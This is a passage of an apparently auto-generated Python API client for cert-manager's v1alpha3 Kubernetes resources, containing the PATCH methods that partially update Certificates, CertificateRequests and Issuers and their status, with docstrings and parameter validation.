:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_certificate_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate # noqa: E501
partially update the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate_request(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request # noqa: E501
partially update the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_request_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_certificate_request_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request # noqa: E501
partially update the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate_request_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request_status # noqa: E501
partially update status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_request_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_certificate_request_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request_status # noqa: E501
partially update status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_status # noqa: E501
partially update status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_certificate_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_status # noqa: E501
partially update status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_issuer(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer # noqa: E501
partially update the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_issuer_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_issuer_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer # noqa: E501
partially update the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_issuer_status(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer_status # noqa: E501
partially update status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_issuer_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def patch_namespaced_issuer_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_issuer_status # noqa: E501
partially update status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_issuer_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
